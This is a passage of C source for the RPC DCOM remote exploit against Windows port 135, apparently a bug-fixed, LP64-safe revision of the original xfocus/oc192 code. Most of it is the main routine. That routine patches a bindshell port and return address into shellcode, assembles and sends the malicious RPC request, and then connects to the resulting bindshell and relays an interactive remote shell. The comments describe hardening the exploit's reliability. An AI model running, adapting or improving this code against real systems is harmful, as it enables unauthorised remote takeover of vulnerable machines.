{
printf("[-] Connection lost..\n");
exit(1);
}
if(write(1, rb, i) < 0) break;
}
if(FD_ISSET(0, &fdreadme))
{
if((i = read(0, rb, sizeof(rb))) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if (send(sockfd, rb, i, 0) < 0) break;
}
usleep(10000);
}
printf("[-] Connection closed by foreign host..\n");
exit(0);
}
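/*
 * 32-bit little-endian field helpers.
 *
 * The original code patched packet fields with `*(unsigned long *)p += x`.
 * On the 32-bit hosts this was written for that is a 4-byte write; on LP64
 * hosts `unsigned long` is 8 bytes, so every fixup also clobbers the four
 * bytes of the neighbouring field (and at sc+471 / the 4-byte `lport`
 * array it writes past the end of the object). These helpers work on bytes
 * only, so they are width-safe, alignment-safe and not subject to
 * strict-aliasing rules. Little-endian matches what the x86 host produced.
 */
static unsigned long get_le32(const unsigned char *p)
{
    return (unsigned long)p[0]
         | ((unsigned long)p[1] << 8)
         | ((unsigned long)p[2] << 16)
         | ((unsigned long)p[3] << 24);
}

static void put_le32(unsigned char *p, unsigned long val)
{
    p[0] = (unsigned char)(val & 0xff);
    p[1] = (unsigned char)((val >> 8) & 0xff);
    p[2] = (unsigned char)((val >> 16) & 0xff);
    p[3] = (unsigned char)((val >> 24) & 0xff);
}

/* In-place add on a little-endian 32-bit field, wrapping at 2^32. */
static void add_le32(unsigned char *p, unsigned long delta)
{
    put_le32(p, (get_le32(p) + delta) & 0xffffffffUL);
}

/*
 * Parse a decimal TCP port in 1..65535.
 * Returns 0 and stores the port on success, -1 on non-numeric input,
 * trailing junk or an out-of-range value. atoi() accepted all of those and
 * the value was then silently truncated to unsigned short, so the old
 * `port > 65535` test could never fire.
 */
static int parse_port(const char *s, unsigned short *out)
{
    char *end = NULL;
    long val = strtol(s, &end, 10);

    if (end == s || *end != '\0' || val < 1 || val > 65535)
        return -1;
    *out = (unsigned short)val;
    return 0;
}

/* Print the target table (index, return address, OS label). */
static void list_targets(void)
{
    size_t a;

    printf("[-] Select a valid target:\n");
    for (a = 0; a < sizeof(targets) / sizeof(v); a++)
        printf(" %d [0x%.8lx]: %s\n", (int)a,
               (unsigned long)targets[a].ret, targets[a].os);
}

/*
 * Entry point for the RPC DCOM exploit (port 135 by default).
 *
 * Options:
 *   -d host   target hostname/IP (required)
 *   -t n      index into targets[] (selects the return address)
 *   -r hex    override targets[type].ret; applied after option parsing so
 *             `-r` may appear before or after `-t`
 *   -p port   RPC endpoint port (default 135)
 *   -l port   port the shellcode's bindshell listens on (default 666)
 *
 * Flow: patch the bindshell port and return address into `sc`, assemble
 * bindstr + request1 + request2 + sc + request3 + request4 with the xfocus
 * length fixups, send it, then connect to the bindshell and hand the socket
 * to con(). Returns 1 on any failure (previously 0, which made scripted use
 * unable to distinguish failure from success); con() exits on its own.
 */
int main(int argc, char **argv)
{
    int sockfd, c;
    size_t len1, off;
    ssize_t n;
    unsigned char *req2;
    unsigned short port = 135;
    unsigned short lportl = 666;         /* bindshell port, host byte order (drg) */
    unsigned long ret_override = 0;
    int have_ret = 0;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned char lport[4];
    struct hostent *he;
    struct sockaddr_in their_addr;
    char *hostname = NULL;
    static const size_t hdr_fixups[] = {
        0x8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0, 0x18c
    };
    size_t i;

    if (argc < 2)
        usage(argv[0]);

    while ((c = getopt(argc, argv, "d:t:r:p:l:")) != -1) {
        switch (c) {
        case 'd':
            hostname = optarg;
            break;
        case 't':
            type = atoi(optarg);
            /* bounded by the table size rather than a hard-coded 1 */
            if (type < 0 || (size_t)type >= sizeof(targets) / sizeof(v)) {
                list_targets();
                return 1;
            }
            break;
        case 'r':
            /* deferred: writing targets[type].ret here would hit whichever
             * target was current at that point, losing the override if -t
             * came later on the command line */
            ret_override = strtoul(optarg, NULL, 16);
            have_ret = 1;
            break;
        case 'p':
            if (parse_port(optarg, &port) < 0) {
                printf("[-] Select a port between 1-65535\n");
                return 1;
            }
            break;
        case 'l':
            /* the original validated `port` here instead of `lportl` */
            if (parse_port(optarg, &lportl) < 0) {
                printf("[-] Select a port between 1-65535\n");
                return 1;
            }
            break;
        default:
            usage(argv[0]);
            return 1;
        }
    }

    if (hostname == NULL) {
        printf("[-] Please enter a hostname with -d\n");
        exit(1);
    }
    if (have_ret)
        targets[type].ret = ret_override;

    printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
    printf("[+] Resolving host..\n");
    if ((he = gethostbyname(hostname)) == NULL) {
        printf("[-] gethostbyname: Couldnt resolve hostname\n");
        exit(1);
    }
    /* sockaddr_in below can only carry an IPv4 address */
    if (he->h_addrtype != AF_INET
        || he->h_length != (int)sizeof(struct in_addr)
        || he->h_addr_list[0] == NULL) {
        printf("[-] gethostbyname: no IPv4 address for hostname\n");
        exit(1);
    }
    printf("[+] Done.\n");
    printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8lx]\n",
           targets[type].os, hostname, port, lportl,
           (unsigned long)targets[type].ret);

    /*
     * Patch the shellcode (drg): the bindshell port lives at sc+471 as the
     * bytes {0x00, port_hi, port_lo, 0x8b} XORed with 0x9432BF80 as one
     * little-endian word; the target return address goes to sc+36.
     */
    if (sizeof(sc) < 471 + 4) {
        printf("[-] Shellcode too short for the port patch\n");
        return 1;
    }
    lport[0] = 0x00;
    lport[1] = (unsigned char)(lportl >> 8);
    lport[2] = (unsigned char)(lportl & 0xff);
    lport[3] = 0x8b;
    put_le32((unsigned char *)sc + 471,
             (get_le32(lport) ^ 0x9432BF80UL) & 0xffffffffUL);
    put_le32((unsigned char *)sc + 36,
             (unsigned long)targets[type].ret & 0xffffffffUL);

    /* xfocus start: assemble the request and fix up its length fields */
    len1 = sizeof(request1) + sizeof(request2) + sizeof(sc)
         + sizeof(request3) + sizeof(request4);
    /* the original copied blindly into a 0x1000-byte stack buffer and then
     * patched up to offset 0x18c+4 without checking either bound */
    if (len1 > sizeof(buf2) || len1 < 0x18c + 4) {
        printf("[-] Request does not fit the send buffer\n");
        return 1;
    }
    off = 0;
    memcpy(buf2 + off, request1, sizeof(request1));
    off += sizeof(request1);
    req2 = buf2 + off;                    /* patched in the copy, not the global */
    memcpy(buf2 + off, request2, sizeof(request2));
    off += sizeof(request2);
    memcpy(buf2 + off, sc, sizeof(sc));
    off += sizeof(sc);
    memcpy(buf2 + off, request3, sizeof(request3));
    off += sizeof(request3);
    memcpy(buf2 + off, request4, sizeof(request4));
    off += sizeof(request4);

    /* two fields in request2 grow by sizeof(sc)/2 (the /2 suggests a
     * wide-char count -- not verifiable from here); eight header fields grow
     * by sizeof(sc)-0xc, as in the original xfocus code */
    add_le32(req2, sizeof(sc) / 2);
    add_le32(req2 + 8, sizeof(sc) / 2);
    for (i = 0; i < sizeof(hdr_fixups) / sizeof(hdr_fixups[0]); i++)
        add_le32(buf2 + hdr_fixups[i], sizeof(sc) - 0xc);
    /* end xfocus */

    memset(&their_addr, 0, sizeof their_addr);
    their_addr.sin_family = AF_INET;
    memcpy(&their_addr.sin_addr, he->h_addr_list[0], sizeof(struct in_addr));
    their_addr.sin_port = htons(port);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("[-] Socket failed");
        return 1;
    }
    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof their_addr) == -1) {
        perror("[-] Connect failed");
        close(sockfd);
        return 1;
    }
    if (send(sockfd, bindstr, sizeof(bindstr), 0) == -1) {
        perror("[-] Send failed");
        close(sockfd);
        return 1;
    }
    /* the bind reply was previously read and its result ignored */
    n = recv(sockfd, buf1, 1000, 0);
    if (n < 0) {
        perror("[-] Recv failed");
        close(sockfd);
        return 1;
    }
    if (n == 0) {
        printf("[-] Connection closed before bind reply\n");
        close(sockfd);
        return 1;
    }
    if (send(sockfd, buf2, len1, 0) == -1) {
        perror("[-] Send failed");
        close(sockfd);
        return 1;
    }
    close(sockfd);
    sleep(1);

    /* same host, bindshell port */
    their_addr.sin_port = htons(lportl);
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("[-] Socket failed");
        return 1;
    }
    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof their_addr) == -1) {
        printf("[-] Couldnt connect to bindshell, possible reasons:\n");
        printf("1:Host is firewalled\n");
        printf("2:Exploit failed\n");
        close(sockfd);
        return 1;
    }
    printf("[+] Connected to bindshell..\n\n");
    sleep(2);
    printf("-- bling bling --\n\n");
    con(sockfd);                          /* does not return; exits itself */
    return 0;
}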